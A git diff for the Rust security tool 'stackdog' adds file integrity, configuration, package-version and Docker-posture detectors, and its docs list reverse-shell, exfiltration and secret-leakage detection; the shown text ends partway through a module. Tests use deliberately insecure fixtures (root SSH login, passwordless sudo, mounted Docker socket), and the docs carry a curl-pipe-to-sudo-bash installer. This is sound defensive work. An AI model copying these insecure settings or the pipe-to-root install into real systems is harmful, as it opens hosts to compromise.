diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 65e9855..eb44eb1 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -36,12 +36,14 @@ jobs: run: cargo install cross --git https://github.com/cross-rs/cross - name: Build release binary + env: + CARGO_TARGET_DIR: target-cross run: cross build --release --target ${{ matrix.target }} - name: Package run: | mkdir -p dist - cp target/${{ matrix.target }}/release/stackdog dist/stackdog + cp target-cross/${{ matrix.target }}/release/stackdog dist/stackdog cd dist tar czf ${{ matrix.artifact }}.tar.gz stackdog sha256sum ${{ matrix.artifact }}.tar.gz > ${{ matrix.artifact }}.tar.gz.sha256 diff --git a/.gitignore b/.gitignore index 89b9d61..5ebfe53 100644 --- a/.gitignore +++ b/.gitignore @@ -33,8 +33,7 @@ Cargo.lock # End of https://www.gitignore.io/api/rust,code .idea -<<<<<<< HEAD -======= *.db ->>>>>>> testing docs/tasks/ +web/node_modules/ +web/dist/ diff --git a/CHANGELOG.md b/CHANGELOG.md index 38b1ddc..169152b 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -7,6 +7,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## [0.2.2] - 2026-04-07 + ### Fixed - **CLI startup robustness** — `.env` loading is now non-fatal. @@ -19,6 +21,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ### Added +- **Expanded detector framework** with additional log-driven detection coverage. + - Reverse shell, sensitive file access, cloud metadata / SSRF, exfiltration chain, and secret leakage detectors. + - file integrity monitoring with SQLite-backed baselines via `STACKDOG_FIM_PATHS`. + - configuration assessment via `STACKDOG_SCA_PATHS`. + - package inventory heuristics via `STACKDOG_PACKAGE_INVENTORY_PATHS`. + - Docker posture audits for privileged mode, host namespaces, dangerous capabilities, Docker socket mounts, and writable sensitive mounts. + +- **Improved syslog ingestion** + - RFC3164 and RFC5424 parsing in file-based log ingestion for cleaner timestamps and normalized message bodies. + #### Log Sniffing & Analysis (`stackdog sniff`) - **CLI Subcommands** — Multi-mode binary with `stackdog serve` and `stackdog sniff` - `--once` flag for single-pass mode @@ -76,6 +88,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Refactored `main.rs` to dispatch `serve`/`sniff` subcommands via clap - Added `events`, `rules`, `alerting`, `models` modules to binary crate - Updated `.env.sample` with `STACKDOG_LOG_SOURCES`, `STACKDOG_AI_*` config vars +- Version metadata updated to `0.2.2` across Cargo, the web package manifest, and current release documentation. ### Testing diff --git a/Cargo.toml b/Cargo.toml index e2e6c0e..85db3ec 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "stackdog" -version = "0.2.1" +version = "0.2.2" authors = ["Vasili Pascal "] edition = "2021" description = "Security platform for Docker containers and Linux servers" @@ -49,6 +49,7 @@ bollard = "0.16" # HTTP client (for LLM API) reqwest = { version = "0.12", default-features = false, features = ["json", "blocking", "rustls-tls"] } +sha2 = "0.10" # Compression zstd = "0.13" diff --git a/DEVELOPMENT.md b/DEVELOPMENT.md index dac5b79..afa725c 100644 --- a/DEVELOPMENT.md +++ b/DEVELOPMENT.md @@ -1,7 +1,7 @@ # Stackdog Security - Development Plan -**Last Updated:** 2026-03-13 -**Current Version:** 0.2.0 +**Last Updated:** 2026-04-07 +**Current Version:** 0.2.2 **Status:** Phase 2 In Progress ## Project Vision diff --git a/README.md b/README.md index 8cf37e7..3d47fc9 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # Stackdog Security -![Version](https://img.shields.io/badge/version-0.2.1-blue.svg) +![Version](https://img.shields.io/badge/version-0.2.2-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) ![Rust](https://img.shields.io/badge/rust-1.75+-orange.svg) ![Platform](https://img.shields.io/badge/platform-linux%20%7C%20macos%20%7C%20windows-lightgrey.svg) @@ -19,6 +19,7 @@ - **📊 Real-time Monitoring** — eBPF-based syscall monitoring with minimal overhead (<5% CPU) - **🔍 Log Sniffing** — Discover, read, and AI-summarize logs from containers and system files +- **🧭 Detector Framework** — Rust-native detector registry for web attack heuristics and outbound exfiltration indicators - **🤖 AI/ML Detection** — Candle-powered anomaly detection + OpenAI/Ollama log analysis - **🚨 Alert System** — Multi-channel notifications (Slack, email, webhook) - **🔒 Automated Response** — nftables/iptables firewall, container quarantine @@ -52,7 +53,7 @@ curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | Pin a specific version: ```bash -curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.1 +curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.2 ``` If your repository has no published stable release yet, use `--version` explicitly. @@ -179,6 +180,14 @@ cargo run -- sniff --consume --output ./log-archive cargo run -- sniff --sources "/var/log/myapp.log,/opt/service/logs" ``` +The built-in sniff pipeline now includes Rust-native detectors for: + +- web attack indicators such as SQL injection probes, path traversal probes, login brute force, and webshell-style requests +- exfiltration-style indicators such as suspicious SMTP/attachment activity and large outbound transfer hints in logs +- reverse shell behavior, sensitive file access, cloud metadata / SSRF access, exfiltration chains, and secret leakage in logs +- Wazuh-inspired file integrity monitoring for explicit paths configured with `STACKDOG_FIM_PATHS=/etc/ssh/sshd_config,/app/.env` +- Wazuh-inspired configuration assessment via `STACKDOG_SCA_PATHS`, package inventory heuristics via `STACKDOG_PACKAGE_INVENTORY_PATHS`, Docker posture audits, and improved RFC3164/RFC5424 syslog parsing + ### Use as Library Add to your `Cargo.toml`: diff --git a/VERSION.md b/VERSION.md index 0c62199..ee1372d 100644 --- a/VERSION.md +++ b/VERSION.md @@ -1 +1 @@ -0.2.1 +0.2.2 diff --git a/docs/INDEX.md b/docs/INDEX.md index 86c7fed..95e8ebd 100644 --- a/docs/INDEX.md +++ b/docs/INDEX.md @@ -1,7 +1,7 @@ # Stackdog Security - Documentation Index -**Version:** 0.2.0 -**Last Updated:** 2026-03-13 +**Version:** 0.2.2 +**Last Updated:** 2026-04-07 --- diff --git a/install.sh b/install.sh index 514bef4..5cc46f0 100755 --- a/install.sh +++ b/install.sh @@ -3,7 +3,7 @@ # # Usage: # curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -# curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.0 +# curl -fsSL https://raw.githubusercontent.com/vsilent/stackdog/main/install.sh | sudo bash -s -- --version v0.2.2 # # Installs the stackdog binary to /usr/local/bin. # Requires: curl, tar, sha256sum (or shasum), Linux x86_64 or aarch64. @@ -73,7 +73,7 @@ resolve_version() { fi if [ -z "$TAG" ]; then - error "Could not determine latest release. Create a GitHub release, or specify one with --version (e.g. --version v0.2.0)." + error "Could not determine latest release. Create a GitHub release, or specify one with --version (e.g. --version v0.2.2)." fi VERSION="$(echo "$TAG" | sed 's/^v//')" @@ -136,7 +136,7 @@ main() { echo "Install stackdog binary to ${INSTALL_DIR}." echo "" echo "Options:" - echo " --version VERSION Install a specific version (e.g. v0.2.0)" + echo " --version VERSION Install a specific version (e.g. v0.2.2)" echo " --help Show this help" exit 0 ;; diff --git a/src/collectors/ebpf/loader.rs b/src/collectors/ebpf/loader.rs index 4ced63f..415070e 100644 --- a/src/collectors/ebpf/loader.rs +++ b/src/collectors/ebpf/loader.rs @@ -4,6 +4,8 @@ //! //! Note: This module is only available on Linux with the ebpf feature enabled +#[cfg(all(target_os = "linux", feature = "ebpf"))] +use anyhow::Context; use anyhow::Result; use std::collections::HashMap; diff --git a/src/collectors/ebpf/syscall_monitor.rs b/src/collectors/ebpf/syscall_monitor.rs index a5d94b1..79b6f40 100644 --- a/src/collectors/ebpf/syscall_monitor.rs +++ b/src/collectors/ebpf/syscall_monitor.rs @@ -6,6 +6,8 @@ use crate::collectors::ebpf::container::ContainerDetector; use crate::collectors::ebpf::enrichment::EventEnricher; use crate::collectors::ebpf::ring_buffer::EventRingBuffer; use crate::events::syscall::SyscallEvent; +#[cfg(all(target_os = "linux", feature = "ebpf"))] +use anyhow::Context; use anyhow::Result; /// Syscall monitor using eBPF diff --git a/src/database/connection.rs b/src/database/connection.rs index e684cfa..98ec13a 100644 --- a/src/database/connection.rs +++ b/src/database/connection.rs @@ -188,6 +188,24 @@ pub fn init_database(pool: &DbPool) -> Result<()> { [], ); + conn.execute( + "CREATE TABLE IF NOT EXISTS file_integrity_baselines ( + path TEXT PRIMARY KEY, + file_type TEXT NOT NULL, + sha256 TEXT NOT NULL, + size_bytes INTEGER NOT NULL, + readonly INTEGER NOT NULL, + modified_at INTEGER NOT NULL, + updated_at TEXT NOT NULL + )", + [], + )?; + + let _ = conn.execute( + "CREATE INDEX IF NOT EXISTS idx_file_integrity_updated_at ON file_integrity_baselines(updated_at)", + [], + ); + conn.execute( "CREATE TABLE IF NOT EXISTS ip_offenses ( id TEXT PRIMARY KEY, diff --git a/src/detectors/audits.rs b/src/detectors/audits.rs new file mode 100644 index 0000000..78758da --- /dev/null +++ b/src/detectors/audits.rs @@ -0,0 +1,490 @@ +use std::fs; + +use anyhow::Result; +use serde::{Deserialize, Serialize}; + +use crate::sniff::analyzer::AnomalySeverity; + +use super::{DetectorFamily, DetectorFinding}; + +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +pub struct ContainerPosture { + pub container_id: String, + pub name: String, + pub image: String, + pub privileged: bool, + pub network_mode: Option, + pub pid_mode: Option, + pub cap_add: Vec, + pub mounts: Vec, +} + +#[derive(Debug, Clone, Default)] +pub struct ConfigAssessmentMonitor; + +#[derive(Debug, Clone, Default)] +pub struct PackageInventoryMonitor; + +#[derive(Debug, Clone, Default)] +pub struct DockerPostureMonitor; + +impl ConfigAssessmentMonitor { + pub fn detect(&self, configured_paths: &[String]) -> Result> { + let mut findings = Vec::new(); + let targets = config_paths(configured_paths); + + for path in targets { + let file_name = path + .file_name() + .and_then(|name| name.to_str()) + .unwrap_or_default(); + if !path.exists() { + continue; + } + + let content = match fs::read_to_string(&path) { + Ok(content) => content, + Err(error) => { + log::debug!( + "Skipping unreadable config assessment target {}: {}", + path.display(), + error + ); + continue; + } + }; + let path_str = path.to_string_lossy().into_owned(); + match file_name { + "sshd_config" => findings.extend(check_sshd_config(&path_str, &content)), + "sudoers" => findings.extend(check_sudoers(&path_str, &content)), + "daemon.json" => findings.extend(check_docker_daemon_config(&path_str, &content)), + _ => {} + } + } + + Ok(findings) + } +} + +impl PackageInventoryMonitor { + pub fn detect(&self, configured_paths: &[String]) -> Result> { + let mut findings = Vec::new(); + + for path in inventory_paths(configured_paths) { + if !path.exists() { + continue; + } + + let content = match fs::read_to_string(&path) { + Ok(content) => content, + Err(error) => { + log::debug!( + "Skipping unreadable package inventory target {}: {}", + path.display(), + error + ); + continue; + } + }; + let path_str = path.to_string_lossy().into_owned(); + let packages = match path.file_name().and_then(|name| name.to_str()) { + Some("status") => parse_dpkg_status(&content), + Some("installed") => parse_apk_installed(&content), + _ => parse_dpkg_status(&content), + }; + + for (package, version) in packages { + if let Some(finding) = check_package_advisory(&path_str, &package, &version) { + findings.push(finding); + } + } + } + + Ok(findings) + } +} + +impl DockerPostureMonitor { + pub fn detect(&self, postures: &[ContainerPosture]) -> Vec { + let mut findings = Vec::new(); + + for posture in postures { + let mut issues = Vec::new(); + if posture.privileged { + issues.push("privileged mode"); + } + if posture.network_mode.as_deref() == Some("host") { + issues.push("host network"); + } + if posture.pid_mode.as_deref() == Some("host") { + issues.push("host PID namespace"); + } + if posture + .cap_add + .iter() + .any(|cap| matches!(cap.as_str(), "SYS_ADMIN" | "NET_ADMIN" | "SYS_PTRACE")) + { + issues.push("dangerous capabilities"); + } + if posture + .mounts + .iter() + .any(|mount| mount.contains("/var/run/docker.sock")) + { + issues.push("docker socket mount"); + } + if posture.mounts.iter().any(|mount| { + mount.contains("/etc:") && (mount.ends_with(":rw") || !mount.contains(":ro")) + }) { + issues.push("writable /etc mount"); + } + + if issues.is_empty() { + continue; + } + + let severity = if posture.privileged + || posture + .mounts + .iter() + .any(|mount| mount.contains("/var/run/docker.sock")) + { + AnomalySeverity::Critical + } else { + AnomalySeverity::High + }; + + findings.push(DetectorFinding { + detector_id: "container.posture-risk".into(), + family: DetectorFamily::Container, + description: format!( + "Container {} has risky posture: {}", + posture.name, + issues.join(", ") + ), + severity, + confidence: 90, + sample_line: format!("{} ({})", posture.name, posture.container_id), + }); + } + + findings + } +} + +fn config_paths(configured_paths: &[String]) -> Vec { + if configured_paths.is_empty() { + default_existing_paths(&[ + "/etc/ssh/sshd_config", + "/etc/sudoers", + "/etc/docker/daemon.json", + ]) + } else { + configured_paths + .iter() + .map(std::path::PathBuf::from) + .collect() + } +} + +fn inventory_paths(configured_paths: &[String]) -> Vec { + if configured_paths.is_empty() { + default_existing_paths(&["/var/lib/dpkg/status", "/lib/apk/db/installed"]) + } else { + configured_paths + .iter() + .map(std::path::PathBuf::from) + .collect() + } +} + +fn default_existing_paths(paths: &[&str]) -> Vec { + paths + .iter() + .map(std::path::PathBuf::from) + .filter(|path| path.exists()) + .collect() +} + +fn check_sshd_config(path: &str, content: &str) -> Vec { + let mut findings = Vec::new(); + let normalized = uncommented_lines(content); + + if normalized + .iter() + .any(|line| line.eq_ignore_ascii_case("PermitRootLogin yes")) + { + findings.push(DetectorFinding { + detector_id: "config.ssh-root-login".into(), + family: DetectorFamily::Configuration, + description: format!("sshd_config allows direct root login: {}", path), + severity: AnomalySeverity::High, + confidence: 92, + sample_line: path.into(), + }); + } + + if normalized + .iter() + .any(|line| line.eq_ignore_ascii_case("PasswordAuthentication yes")) + { + findings.push(DetectorFinding { + detector_id: "config.ssh-password-auth".into(), + family: DetectorFamily::Configuration, + description: format!("sshd_config enables password authentication: {}", path), + severity: AnomalySeverity::Medium, + confidence: 84, + sample_line: path.into(), + }); + } + + findings +} + +fn check_sudoers(path: &str, content: &str) -> Vec { + uncommented_lines(content) + .iter() + .filter(|line| line.contains("NOPASSWD: ALL")) + .map(|_| DetectorFinding { + detector_id: "config.sudoers-nopasswd".into(), + family: DetectorFamily::Configuration, + description: format!("sudoers grants passwordless full sudo access: {}", path), + severity: AnomalySeverity::High, + confidence: 91, + sample_line: path.into(), + }) + .collect() +} + +fn check_docker_daemon_config(path: &str, content: &str) -> Vec { + let mut findings = Vec::new(); + + let parsed = match serde_json::from_str::(content) { + Ok(value) => value, + Err(_) => { + findings.push(DetectorFinding { + detector_id: "config.docker-invalid-json".into(), + family: DetectorFamily::Configuration, + description: format!("Docker daemon config is not valid JSON: {}", path), + severity: AnomalySeverity::Medium, + confidence: 80, + sample_line: path.into(), + }); + return findings; + } + }; + + if parsed + .get("icc") + .and_then(|value| value.as_bool()) + .unwrap_or(true) + { + findings.push(DetectorFinding { + detector_id: "config.docker-icc".into(), + family: DetectorFamily::Configuration, + description: format!( + "Docker daemon config allows inter-container communication: {}", + path + ), + severity: AnomalySeverity::Medium, + confidence: 82, + sample_line: path.into(), + }); + } + + if parsed.get("userns-remap").is_none() { + findings.push(DetectorFinding { + detector_id: "config.docker-userns".into(), + family: DetectorFamily::Configuration, + description: format!( + "Docker daemon config does not enable user namespace remapping: {}", + path + ), + severity: AnomalySeverity::Medium, + confidence: 78, + sample_line: path.into(), + }); + } + + findings +} + +fn uncommented_lines(content: &str) -> Vec { + content + .lines() + .map(str::trim) + .filter(|line| !line.is_empty() && !line.starts_with('#')) + .map(ToString::to_string) + .collect() +} + +fn parse_dpkg_status(content: &str) -> Vec<(String, String)> { + let mut packages = Vec::new(); + + for stanza in content.split("\n\n") { + let mut package = None; + let mut version = None; + + for line in stanza.lines() { + if let Some(value) = line.strip_prefix("Package: ") { + package = Some(value.trim().to_string()); + } else if let Some(value) = line.strip_prefix("Version: ") { + version = Some(value.trim().to_string()); + } + } + + if let (Some(package), Some(version)) = (package, version) { + packages.push((package, version)); + } + } + + packages +} + +fn parse_apk_installed(content: &str) -> Vec<(String, String)> { + let mut packages = Vec::new(); + let mut package = None; + let mut version = None; + + for line in content.lines() { + if let Some(value) = line.strip_prefix("P:") { + package = Some(value.trim().to_string()); + } else if let Some(value) = line.strip_prefix("V:") { + version = Some(value.trim().to_string()); + } else if line.trim().is_empty() { + if let (Some(package), Some(version)) = (package.take(), version.take()) { + packages.push((package, version)); + } + } + } + + if let (Some(package), Some(version)) = (package, version) { + packages.push((package, version)); + } + + packages +} + +fn check_package_advisory(path: &str, package: &str, version: &str) -> Option { + let advisories: [(&str, &[&str], AnomalySeverity); 4] = [ + ("openssl", &["1.0.", "1.1.0"], AnomalySeverity::High), + ( + "openssh-server", + &["7.", "8.0", "8.1"], + AnomalySeverity::High, + ), + ("sudo", &["1.8."], AnomalySeverity::Medium), + ("bash", &["4.3"], AnomalySeverity::Medium), + ]; + + advisories + .into_iter() + .find_map(|(name, risky_prefixes, severity)| { + (package == name + && risky_prefixes + .iter() + .any(|prefix| version.starts_with(prefix))) + .then(|| DetectorFinding { + detector_id: "vuln.legacy-package".into(), + family: DetectorFamily::Vulnerability, + description: format!( + "Legacy package version detected in {}: {} {}", + path, package, version + ), + severity, + confidence: 83, + sample_line: format!("{} {}", package, version), + }) + }) +} + +#[cfg(test)] +mod tests { + use super::*; + use std::collections::HashSet; + + #[test] + fn test_config_assessment_detects_insecure_sshd_and_sudoers() { + let dir = tempfile::tempdir().unwrap(); + let sshd = dir.path().join("sshd_config"); + let sudoers = dir.path().join("sudoers"); + fs::write(&sshd, "PermitRootLogin yes\nPasswordAuthentication yes\n").unwrap(); + fs::write(&sudoers, "admin ALL=(ALL) NOPASSWD: ALL\n").unwrap(); + + let monitor = ConfigAssessmentMonitor; + let findings = monitor + .detect(&[ + sshd.to_string_lossy().into_owned(), + sudoers.to_string_lossy().into_owned(), + ]) + .unwrap(); + + let ids = findings + .iter() + .map(|finding| finding.detector_id.as_str()) + .collect::>(); + assert!(ids.contains("config.ssh-root-login")); + assert!(ids.contains("config.ssh-password-auth")); + assert!(ids.contains("config.sudoers-nopasswd")); + } + + #[test] + fn test_config_assessment_detects_docker_daemon_gaps() { + let dir = tempfile::tempdir().unwrap(); + let daemon = dir.path().join("daemon.json"); + fs::write(&daemon, r#"{"icc": true}"#).unwrap(); + + let monitor = ConfigAssessmentMonitor; + let findings = monitor + .detect(&[daemon.to_string_lossy().into_owned()]) + .unwrap(); + + let ids = findings + .iter() + .map(|finding| finding.detector_id.as_str()) + .collect::>(); + assert!(ids.contains("config.docker-icc")); + assert!(ids.contains("config.docker-userns")); + } + + #[test] + fn test_package_inventory_detects_legacy_versions() { + let dir = tempfile::tempdir().unwrap(); + let status = dir.path().join("status"); + fs::write( + &status, + "Package: openssl\nVersion: 1.0.2u-1\n\nPackage: sudo\nVersion: 1.8.31-1\n", + ) + .unwrap(); + + let monitor = PackageInventoryMonitor; + let findings = monitor + .detect(&[status.to_string_lossy().into_owned()]) + .unwrap(); + + assert_eq!(findings.len(), 2); + assert!(findings + .iter() + .all(|finding| finding.detector_id == "vuln.legacy-package")); + } + + #[test] + fn test_docker_posture_monitor_summarizes_risky_container_settings() { + let monitor = DockerPostureMonitor; + let findings = monitor.detect(&[ContainerPosture { + container_id: "abc123".into(), + name: "web".into(), + image: "nginx:latest".into(), + privileged: true, + network_mode: Some("host".into()), + pid_mode: Some("host".into()), + cap_add: vec!["SYS_ADMIN".into()], + mounts: vec!["/var/run/docker.sock:/var/run/docker.sock:rw".into()], + }]); + + assert_eq!(findings.len(), 1); + assert_eq!(findings[0].detector_id, "container.posture-risk"); + assert_eq!(findings[0].family, DetectorFamily::Container); + assert!(findings[0].description.contains("privileged mode")); + } +} diff --git a/src/detectors/integrity.rs b/src/detectors/integrity.rs new file mode 100644 index 0000000..21111cd --- /dev/null +++ b/src/detectors/integrity.rs @@ -0,0 +1,393 @@ +use std::collections::HashMap; +use std::fs; +use std::io::{ErrorKind, Read}; +use std::path::{Path, PathBuf}; +use std::time::UNIX_EPOCH; + +use anyhow::{Context, Result}; +use chrono::Utc; +use rusqlite::params; +use sha2::{Digest, Sha256}; + +use crate::database::connection::DbPool; +use crate::sniff::analyzer::AnomalySeverity; + +use super::{DetectorFamily, DetectorFinding}; + +const DETECTOR_ID: &str = "integrity.file-baseline"; + +#[derive(Debug, Clone, Default)] +pub struct FileIntegrityMonitor; + +#[derive(Debug, Clone)] +struct FileSnapshot { + path: String, + file_type: String, + sha256: String, + size_bytes: u64, + readonly: bool, + modified_at: i64, +} + +impl FileIntegrityMonitor { + pub fn detect(&self, pool: &DbPool, paths: &[String]) -> Result> { + if paths.is_empty() { + return Ok(Vec::new()); + } + + let scopes = normalize_scopes(paths)?; + let previous = load_snapshots(pool, &scopes)?; + let current = collect_snapshots(&scopes)?; + let findings = diff_snapshots(&scopes, &previous, ¤t); + + persist_snapshots(pool, ¤t, &previous)?; + + Ok(findings) + } +} + +fn normalize_scopes(paths: &[String]) -> Result> { + let current_dir = std::env::current_dir().context("Failed to read current directory")?; + let mut scopes = Vec::new(); + + for path in paths { + let trimmed = path.trim(); + if trimmed.is_empty() { + continue; + } + + let candidate = PathBuf::from(trimmed); + let normalized = if candidate.exists() { + candidate.canonicalize().with_context(|| { + format!( + "Failed to canonicalize integrity path {}", + candidate.display() + ) + })? + } else if candidate.is_absolute() { + candidate + } else { + current_dir.join(candidate) + }; + + if !scopes.iter().any(|existing| existing == &normalized) { + scopes.push(normalized); + } + } + + Ok(scopes) +} + +fn load_snapshots(pool: &DbPool, scopes: &[PathBuf]) -> Result> { + let conn = pool.get()?; + let mut stmt = conn.prepare( + "SELECT path, file_type, sha256, size_bytes, readonly, modified_at + FROM file_integrity_baselines", + )?; + let rows = stmt.query_map([], |row| { + Ok(FileSnapshot { + path: row.get(0)?, + file_type: row.get(1)?, + sha256: row.get(2)?, + size_bytes: row.get::<_, i64>(3)? as u64, + readonly: row.get::<_, i64>(4)? != 0, + modified_at: row.get(5)?, + }) + })?; + + let mut snapshots = HashMap::new(); + for row in rows { + let snapshot = row?; + if scopes + .iter() + .any(|scope| path_is_within_scope(&snapshot.path, scope)) + { + snapshots.insert(snapshot.path.clone(), snapshot); + } + } + + Ok(snapshots) +} + +fn collect_snapshots(scopes: &[PathBuf]) -> Result> { + let mut snapshots = HashMap::new(); + + for scope in scopes { + collect_path(scope, &mut snapshots)?; + } + + Ok(snapshots) +} + +fn collect_path(path: &Path, snapshots: &mut HashMap) -> Result<()> { + let metadata = match fs::symlink_metadata(path) { + Ok(metadata) => metadata, + Err(error) if error.kind() == ErrorKind::NotFound => return Ok(()), + Err(error) => { + return Err(error) + .with_context(|| format!("Failed to inspect integrity path {}", path.display())); + } + }; + + if metadata.file_type().is_symlink() { + return Ok(()); + } + + if metadata.is_dir() { + let mut entries = fs::read_dir(path)? + .collect::, _>>() + .with_context(|| format!("Failed to read integrity directory {}", path.display()))?; + entries.sort_by_key(|entry| entry.path()); + + for entry in entries { + collect_path(&entry.path(), snapshots)?; + } + + return Ok(()); + } + + if metadata.is_file() { + let snapshot = snapshot_file(path, &metadata)?; + snapshots.insert(snapshot.path.clone(), snapshot); + } + + Ok(()) +} + +fn snapshot_file(path: &Path, metadata: &fs::Metadata) -> Result { + let mut file = fs::File::open(path) + .with_context(|| format!("Failed to open monitored file {}", path.display()))?; + let mut hasher = Sha256::new(); + let mut buffer = [0_u8; 8192]; + + loop { + let read = file + .read(&mut buffer) + .with_context(|| format!("Failed to hash monitored file {}", path.display()))?; + if read == 0 { + break; + } + hasher.update(&buffer[..read]); + } + + let modified_at = metadata + .modified() + .ok() + .and_then(|time| time.duration_since(UNIX_EPOCH).ok()) + .map(|duration| duration.as_secs() as i64) + .unwrap_or(0); + let normalized_path = path + .canonicalize() + .unwrap_or_else(|_| path.to_path_buf()) + .to_string_lossy() + .into_owned(); + + Ok(FileSnapshot { + path: normalized_path, + file_type: "file".into(), + sha256: format!("{:x}", hasher.finalize()), + size_bytes: metadata.len(), + readonly: metadata.permissions().readonly(), + modified_at, + }) +} + +fn diff_snapshots( + scopes: &[PathBuf], + previous: &HashMap, + current: &HashMap, +) -> Vec { + let mut findings = Vec::new(); + + for (path, snapshot) in current { + match previous.get(path) { + Some(before) => { + if let Some(finding) = compare_snapshot(before, snapshot) { + findings.push(finding); + } + } + None if scope_has_baseline(path, scopes, previous) => findings.push(DetectorFinding { + detector_id: DETECTOR_ID.into(), + family: DetectorFamily::Integrity, + description: format!("New file observed in monitored integrity path: {}", path), + severity: AnomalySeverity::Medium, + confidence: 79, + sample_line: path.clone(), + }), + None => {} + } + } + + for path in previous.keys() { + if !current.contains_key(path) { + findings.push(DetectorFinding { + detector_id: DETECTOR_ID.into(), + family: DetectorFamily::Integrity, + description: format!("Previously monitored file is missing: {}", path), + severity: AnomalySeverity::High, + confidence: 88, + sample_line: path.clone(), + }); + } + } + + findings.sort_by(|left, right| left.sample_line.cmp(&right.sample_line)); + findings +} + +fn compare_snapshot(previous: &FileSnapshot, current: &FileSnapshot) -> Option { + let mut drift = Vec::new(); + + if previous.file_type != current.file_type { + drift.push("type"); + } + if previous.sha256 != current.sha256 { + drift.push("content"); + } + if previous.size_bytes != current.size_bytes { + drift.push("size"); + } + if previous.readonly != current.readonly { + drift.push("permissions"); + } + if previous.modified_at == 0 && current.modified_at != 0 { + drift.push("modified_time"); + } + + if drift.is_empty() { + return None; + } + + Some(DetectorFinding { + detector_id: DETECTOR_ID.into(), + family: DetectorFamily::Integrity, + description: format!( + "File integrity drift detected for {} ({})", + current.path, + drift.join(", ") + ), + severity: if drift.contains(&"content") || drift.contains(&"permissions") { + AnomalySeverity::High + } else { + AnomalySeverity::Medium + }, + confidence: 93, + sample_line: current.path.clone(), + }) +} + +fn scope_has_baseline( + path: &str, + scopes: &[PathBuf], + previous: &HashMap, +) -> bool { + scopes.iter().any(|scope| { + path_is_within_scope(path, scope) + && previous + .keys() + .any(|existing| path_is_within_scope(existing, scope)) + }) +} + +fn path_is_within_scope(path: &str, scope: &Path) -> bool { + let scope_str = scope.to_string_lossy(); + let scope_str = scope_str.trim_end_matches('/'); + path == scope_str || path.starts_with(&format!("{}/", scope_str)) +} + +fn persist_snapshots( + pool: &DbPool, + current: &HashMap, + previous: &HashMap, +) -> Result<()> { + let conn = pool.get()?; + + for snapshot in current.values() { + conn.execute( + "INSERT INTO file_integrity_baselines ( + path, file_type, sha256, size_bytes, readonly, modified_at, updated_at + ) VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7) + ON CONFLICT(path) DO UPDATE SET + file_type = excluded.file_type, + sha256 = excluded.sha256, + size_bytes = excluded.size_bytes, + readonly = excluded.readonly, + modified_at = excluded.modified_at, + updated_at = excluded.updated_at", + params![ + &snapshot.path, + &snapshot.file_type, + &snapshot.sha256, + snapshot.size_bytes as i64, + if snapshot.readonly { 1_i64 } else { 0_i64 }, + snapshot.modified_at, + Utc::now().to_rfc3339(), + ], + )?; + } + + for path in previous.keys() { + if !current.contains_key(path) { + conn.execute( + "DELETE FROM file_integrity_baselines WHERE path = ?1", + params![path], + )?; + } + } + + Ok(()) +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::database::connection::{create_pool, init_database}; + + #[test] + fn test_file_integrity_monitor_detects_content_drift() { + let dir = tempfile::tempdir().unwrap(); + let monitored = dir.path().join("app.env"); + fs::write(&monitored, "API_KEY=first").unwrap(); + + let pool = create_pool(":memory:").unwrap(); + init_database(&pool).unwrap(); + let monitor = FileIntegrityMonitor; + let paths = vec![monitored.to_string_lossy().into_owned()]; + + let initial = monitor.detect(&pool, &paths).unwrap(); + assert!(initial.is_empty()); + + fs::write(&monitored, "API_KEY=second").unwrap(); + + let findings = monitor.detect(&pool, &paths).unwrap(); + assert_eq!(findings.len(), 1); + assert_eq!(findings[0].detector_id, DETECTOR_ID); + assert!(findings[0].description.contains("File integrity drift")); + } + + #[test] + fn test_file_integrity_monitor_detects_new_file_in_monitored_directory() { + let dir = tempfile::tempdir().unwrap(); + let existing = dir.path().join("existing.conf"); + fs::write(&existing, "setting=true").unwrap(); + + let pool = create_pool(":memory:").unwrap(); + init_database(&pool).unwrap(); + let monitor = FileIntegrityMonitor; + let paths = vec![dir.path().to_string_lossy().into_owned()]; + + let initial = monitor.detect(&pool, &paths).unwrap(); + assert!(initial.is_empty()); + + let added = dir.path().join("added.conf"); + fs::write(&added, "setting=false").unwrap(); + + let findings = monitor.detect(&pool, &paths).unwrap(); + assert_eq!(findings.len(), 1); + assert!(findings[0].description.contains("New file observed")); + assert_eq!( + findings[0].sample_line, + added.canonicalize().unwrap().to_string_lossy().into_owned() + ); + } +} diff --git a/src/detectors/mod.rs b/src/detectors/mod.rs new file mode 100644 index 0000000..a32c54f --- /dev/null +++ b/src/detectors/mod.rs @@ -0,0 +1,849 @@ +//! Detector framework with built-in log, integrity, and audit detectors. +//! +//! This is the first step toward a larger detector platform: a small registry +//! that can run built-in detectors over log entries and emit structured +//! anomalies that flow through the existing sniff/reporting pipeline. + +mod audits; +mod integrity; + +use std::collections::HashSet; + +use anyhow::Result; +use serde::{Deserialize, Serialize}; + +pub use self::audits::ContainerPosture; + +use self::audits::{ConfigAssessmentMonitor, DockerPostureMonitor, PackageInventoryMonitor}; +use self::integrity::FileIntegrityMonitor; +use crate::database::connection::DbPool; +use crate::sniff::analyzer::{AnomalySeverity, LogAnomaly}; +use crate::sniff::reader::LogEntry; + +/// High-level detector families that can be surfaced in alerts and APIs. +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +pub enum DetectorFamily { + Web, + Exfiltration, + Execution, + FileAccess, + Integrity, + Configuration, + Container, + Vulnerability, + Cloud, + Secrets, +} + +impl 